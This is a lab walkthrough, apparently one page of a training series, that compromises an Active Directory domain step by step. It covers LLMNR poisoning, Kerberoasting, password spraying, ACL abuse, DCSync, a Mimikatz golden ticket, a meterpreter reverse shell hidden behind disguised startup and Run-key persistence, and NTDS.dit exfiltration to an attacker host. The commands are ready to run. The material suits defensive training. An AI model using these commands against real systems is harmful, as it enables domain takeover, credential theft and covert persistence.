The Attack

In this scenario I tried to combine some know attacks together like:

  • LLMNR/NBT-NS Poisoning Attack

  • Kerberoasting Attack

  • Pass the Hash Attack

  • seTakeOwnerShipPrivilege Attack

  • ACL Abuse Tactics Attack

  • Golden Ticket Attack

Let's begin by enumerating the internal network to identify active hosts, critical services, and potential entry points. This process may involve both active and passive techniques to discover users, systems, and vulnerabilities that could be leveraged to gain further access.

There are several methods available for enumerating the AD environment to identify live hosts, such as using Wireshark, tcpdump, Responder in analysis mode, fping, or nmap. Let's explore some of these techniques.

fping -asgq 192.168.1.0/16

Let's just focus on the IPs that related to our scenario and Ignore the others.

Now that we have a list of active hosts within our network, we can enumerate those hosts further. We are looking to determine what services each host is running, identify critical hosts such as Domain Controllers and web servers, and identify potentially vulnerable hosts to probe later.

nmap -v -A -iL hosts.txt -oN /home/fares/host-enum

From the results now, I know that:

  • COM01: 192.168.1.13

  • COM02: 192.168.1.11

  • COM04: 192.168.1.16

  • DC01: 192.168.1.10

Let's start gathering a list of valid domain users, which we will reference later in our assessment.

Kerbrute offers a more discreet method for enumerating domain accounts by leveraging Kerberos pre-authentication failures, which typically do not generate logs or trigger security alerts.

kerbrute userenum -d Main.local --dc 192.168.1.10 wordlist.txt -o valid_users

Our output shows that 15 users were successfully validated within the Main.local domain in just a few seconds. These results can now be compiled into a list for use in targeted password spraying activities.

Now that we have gathered user information and identified live hostnames along with their IP addresses, we can proceed with performing LLMNR/NBT-NS poisoning in hopes of capturing valuable credentials.

Let’s walk through a high-level example from HTB of the attack flow:

  1. A user attempts to connect to the print server at \\print01.Main.local, but mistakenly enters \\printer01.Main.local.

  2. The DNS server replies that the requested hostname cannot be resolved.

  3. The host then broadcasts a query across the local network to locate \\printer01.Main.local.

  4. The attacker, running a tool like Responder, replies to this broadcast, claiming to be the requested host.

  5. Trusting the response, the host sends an authentication request to the attacker, including the username and NTLMv2 password hash.

  6. The attacker can then either attempt to crack the hash offline or leverage it in an SMB relay attack, depending on the environment.

responder -I eth0

Next, let's intentionally attempt to access a non-existent network share to observe the system's response.

dir \\COM011\share

Let's now review the Responder output to determine whether any NTLM hashes were captured.

Here, we can see that the NTLM hash for the user account alice.smith has been obtained.

Next, we'll save the hash to a file and proceed to crack it using Hashcat.

hashcat -m 5600 alice_hash /usr/share/wordlists/rockyou.txt

Now that we have obtained valid credentials, we can proceed with further enumeration.

Let's attempt to retrieve the domain password policy using the credentials of the alice.smith account.

crackmapexec smb 192.168.1.10 -u alice.smith -p password123! --pass-pol

We can utilize CrackMapExec with the --users flag, which provides valuable information, including the badpwdcount (number of invalid login attempts). This allows us to identify and exclude accounts that are nearing the lockout threshold from our target list.

crackmapexec smb 192.168.1.10 -u alice.smith -p password123! --users

We have identified additional usernames that can be added to our wordlist.

We can also generate a comprehensive list of domain groups. It is recommended to save all output to files for easier access later.

crackmapexec smb 192.168.1.10 -u alice.smith -p password123! --groups

We can use the --shares flag to enumerate the available shares on the remote host and determine the level of access granted to our user account for each share.

crackmapexec smb 192.168.1.10 -u alice.smith -p password123! --shares

Now that we’ve identified the user alice.smith on the host 192.168.1.11, we can proceed to check which users are currently logged into the machine.

crackmapexec smb 192.168.1.11 -u alice.smith -p password123! --loggedon-users

The IP addresses of the machines have been updated as follows:

  • COM01: 192.168.204.165

  • COM02: 192.168.204.171

  • COM04: 192.168.204.172

  • DC01: 192.168.204.163

Since we did not obtain any useful information from the previous step, the next step is to enumerate the Service Principal Names (SPNs) within the domain. To proceed, we will need valid domain credentials and the IP address of a Domain Controller, which we already have.

impacket/examples/GetUserSPNs.py -dc-ip 192.168.204.163 Main.local/alice.smith

We can now extract all TGS tickets for offline processing using the -request flag. The tickets will be saved in a format compatible with tools like Hashcat or John the Ripper for offline password cracking.

impacket/examples/GetUserSPNs.py -dc-ip 192.168.204.163 Main.local/alice.smith:password123! -request

I attempted to crack the NTLM hash for the sqlsvc account, but it was unsuccessful. I will now proceed to attempt cracking the NTLM hash for the alewis account.

hashcat -m 13100 alewis_tgs /usr/share/wordlists/rockyou.txt

Let's verify whether the user alewis can log in to 192.168.204.171, and determine which authentication protocol is supported for the connection.

crackmapexec smb 192.168.204.171 -u alewis -p 'P@ssw0rd123!'
crackmapexec winrm 192.168.204.171 -u alewis -p 'P@ssw0rd123!'

Let's use Evil-WinRM to authenticate with the alewis account.

evil-winrm -i 192.168.204.171 -u alewis -p 'P@ssw0rd123!'

We have successfully logged into COM01. Next, we will perform enumeration to determine the actions we can take on this machine.

Evil-WinRM supports loading PowerShell scripts by specifying the -s option, where refers to the directory containing the scripts you wish to import.

evil-winrm -i 192.168.204.171 -u alewis -p 'P@ssw0rd123!' -s /home/fares

Let's upload PowerView.ps1 to COM01, as this script provides a wide range of capabilities we can leverage for further actions.

Bypass-4MSI
PowerView.ps1
menu

In the command above, we established a session and imported PowerView.ps1 from the /home/fares directory. We then executed the menu command, which displayed the default options along with the additional cmdlets made available through the PowerView module.

During enumeration, I discovered three additional users on the system: charles, sarahg, and tech_support. I will add these users to a list and perform a password spraying attack using one password at a time to avoid triggering the account lockout policy.

kerbrute passwordspray -d main.local --dc 192.168.204.163 users.txt CreativeMind@24

Now that we have obtained the password for the user sarahg, let's verify if she can successfully log in to 192.168.204.165, and identify the authentication protocol supported for the connection.

crackmapexec winrm 192.168.204.165 -u sarahg -p 'CreativeMind@24'
crackmapexec smb 192.168.204.165 -u sarahg -p 'CreativeMind@24'

While reviewing the privileges assigned to the sarahg account, I discovered that it has the SeTakeOwnershipPrivilege. This privilege allows the account to take ownership of any securable object, including Active Directory objects, NTFS files and folders, printers, registry keys, services, and processes.

This privilege grants WRITE_OWNER permissions on an object, allowing the user to modify the object's ownership within its security descriptor. By default, it is assigned to administrators. It is uncommon for standard user accounts to possess this privilege.

evil-winrm -i 192.168.204.165 -u sarahg -p 'CreativeMind@24'
whoami /priv

In the lab setup, I created a file named auth.txt in the Documents folder of the user tech_support. While a regular user cannot access this file, our user sarahg possesses the SeTakeOwnershipPrivilege, allowing us to take ownership and view its contents. 

takeown /f C:\Users\tech_support\Documents\auth.txt
icacls "C:\Users\tech_support\Documents\auth.txt" /grant MAIN\sarahg:F
Get-ChildItem -Path 'C:\Users\tech_support\Documents\auth.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

Let's retrieve the contents of the auth.txt file.

more C:\Users\tech_support\Documents\auth.txt

We have successfully compromised COM02 and COM01. Next, we will attempt to use the obtained credentials to access COM04 and determine if it is accessible.

netexec rdp 192.168.204.172 -u tech_support -p 'DevOps!42' -d Main.local

As observed, the tech_support account has RDP access to COM04 at IP address 192.168.204.172. Therefore, we will attempt to establish a connection using the tech_support account credentials.

xfreerdp3 /u:tech_support /p:'DevOps!42' /v:192.168.204.172 /d:Main.local  /dynamic-resolution

Let’s begin by performing some enumeration to assess our available options.

Let's download PowerView.ps1 from our attack machine to perform enumeration tasks.

certutil.exe -urlcache -f http://192.168.204.152:8080/PowerView.ps1 .\PowerView.ps1
Import-Module .\PowerView.ps1

Let's review the Domain Admins group to identify its members.

Get-DomainGroupMember -Identity "Domain Admins" -ErrorAction SilentlyContinue

Let's review the Access Control List (ACL) for the user danderson to determine the permissions assigned to their account.

Get-DomainObjectAcl -Identity danderson -Domain Main.local -ResolveGUIDs -ErrorAction SilentlyContinue | ? {$_.ActiveDirectoryRights -match 'GenericAll'}

We have confirmed that the user danderson has GenericAll permissions over the Domain Admins group. With access to this user's credentials, it would be possible to add any account to the Domain Admins group and execute a DCSync attack.

We will use Inveigh on COM04 to perform a man-in-the-middle attack in an effort to capture the user's NTLM hash.

certutil.exe -urlcache -f http://192.168.204.152:8080/Inveigh.ps1 .\Inveigh.ps1
Import-Module .\Inveigh.ps1
Invoke-Inveigh -NBNS Y LLMNR Y -ConsoleOutput Y -FileOutput Y

Next, let’s attempt to connect to a non-existent server to see if the user’s NTLM hash is captured as a result.

Unfortunately, we were unable to obtain the NTLM hash for the user danderson. As an alternative, let's attempt to use Responder, as we did at the beginning of the attack.

responder -I eth0
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-fe80::50ad:d787:10ec:198e.txt

Let's attempt to crack this hash using Hashcat.

hashcat -m 5600 danderson_hash /usr/share/wordlists/rockyou.txt

Now, within our RDP session, let's initiate a new session as the danderson user.

runas /user:Main\danderson powershell.exe

Next, let's add the user danderson to the Domain Admins group.

net group "Domain Admins" danderson /add /domain

We are now a member of the Domain Admins group.

Next, we will attempt to execute the attack using secretsdump.py from our attack machine.

secretsdump.py Main.local/danderson:'PayRoll$ystem!'@192.168.204.163 -just-dc-user administrator
secretsdump.py Main.local/danderson:'PayRoll$ystem!'@192.168.204.163 -just-dc-user krbtgt

We now have several options available to us. For example, we can log in to the Domain Controller using the Administrator's hash and establish persistence by creating a Golden Ticket. Alternatively, we could create a malicious service, modify a process name, add a shortcut, or even dump the NTDS.dit file. Let’s begin by logging into the Domain Controller using the Administrator account.

psexec.py main.local/administrator@192.168.204.163 -hashes :baea263f1d7f5474de34adf195f4d38c

Let's begin by creating a golden ticket with a one-year validity period. To do this, we'll first download Mimikatz on the Domain Controller.

To execute a Golden Ticket attack, Mimikatz can be utilized with the following parameters:

  • /domain: Specifies the target domain name.

  • /sid: Defines the Security Identifier (SID) of the domain.

  • /rc4: Provides the NTLM hash of the krbtgt account password.

  • /user: Specifies the username for which Mimikatz will generate the Kerberos ticket.

  • /id: Represents the Relative Identifier (RID), which is the last portion of the user's SID, for whom the ticket will be issued.

certutil.exe -urlcache -f http://192.168.204.152:8080/mimikatz.exe .\mimikatz.exe
lsadump::lsa /domain
kerberos::golden /user:Administrator /domain:Main.local /sid:S-1-5-21-620716483-2719109048-3577772375 /rc4:b2b2d70531cd51d69f0e6414902f29f1 /id:500 /endin:5256000 /ptt

We used Mimikatz to generate a golden ticket with a validity period of one year.

Let's also explore an alternative persistence mechanism by creating a shortcut. so we need to create an executable file and download it on the DC server, we'll use it with the shortcut

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.204.152 LPORT=1557 -f exe -o wsock32.exe

Next, we will proceed to create the shortcut.

powershell -c "Invoke-WebRequest -Uri http://192.168.204.152:8080/wsock32.exe -OutFile C:\ProgramData\Microsoft\wsock32.exe"

nano PatchInstaller.vbs
Set WShell = CreateObject("WScript.Shell")
ShortcutPath = WShell.ExpandEnvironmentStrings("%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\PatchInstaller.lnk")
Set Shortcut = WShell.CreateShortcut(ShortcutPath)
Shortcut.TargetPath = "C:\ProgramData\Microsoft\wsock32.exe"
Shortcut.WorkingDirectory = "C:\ProgramData\Microsoft"
Shortcut.Description = "Network Diagnostics Tool"
Shortcut.Save

Next, we'll download and execute the VBS script to create the shortcut.

certutil -urlcache -split -f http://192.168.204.152:8080/PatchInstaller.vbs C:\programdata\PatchInstaller.vbs
C:\programdata\PatchInstaller.vbs

Let's also create a registry using the same executable we downloaded before

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "JavaUpdate" /t REG_SZ /d "C:\ProgramData\Microsoft\wsock32.exe" /f
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v JavaUpdate

Finally, extract the NTDS.dit file and save it locally for later exfiltration to your attack machine.

%windir%\SysNative\vssadmin.exe create shadow /for=C:

Next, let's proceed to copy the necessary files to the Public folder.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\NTDS\NTDS.dit C:\Users\Public\data\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\System32\config\SYSTEM C:\Users\Public\data\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\System32\config\SECURITY C:\Users\Public\data\SECURITY

Next, we will compress the data into a ZIP file and transfer it to our local machine.

Compress-Archive -path "C:\Users\Public\data\*" -DestinationPath "C:\Users\Public\data.zip"

Next, we will proceed to transfer the file via SMB.

mkdir /tmp/smbshare
impacket-smbserver sharename /tmp/smbshare -smb2support -username admin -password admin
net use \\192.168.204.152\sharename /user:admin admin
Copy-Item C:\Users\Public\data.zip \\192.168.204.152\sharename\
PreviousLab SetupNextThe Investigation

Last updated